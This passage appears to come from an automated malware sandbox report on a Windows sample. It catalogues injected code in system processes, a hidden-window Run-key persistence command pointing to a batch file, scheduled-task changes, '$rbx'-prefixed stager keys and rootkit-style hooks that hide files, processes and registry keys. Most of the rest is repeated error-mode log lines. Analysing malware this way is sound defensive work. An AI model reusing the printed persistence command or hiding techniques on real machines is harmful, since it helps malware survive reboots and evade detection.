Source: C:\Windows\System32\svchost.exe	Code function: 41_3_000002A6612EA7DD push rcx; retf 003Fh	41_3_000002A6612EA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAEDCA7DD push rcx; retf 003Fh	42_3_000002BAAEDCA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 42_3_000002BAAED9A7DD push rcx; retf 003Fh	42_3_000002BAAED9A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 43_3_0000026A879AA7DD push rcx; retf 003Fh	43_3_0000026A879AA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_000001795378A7DD push rcx; retf 003Fh	44_3_000001795378A7DE
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_3_0000016CE5E3A7DD push rcx; retf 003Fh	45_3_0000016CE5E3A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_000002295D54A7DD push rcx; retf 003Fh	46_3_000002295D54A7DE

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
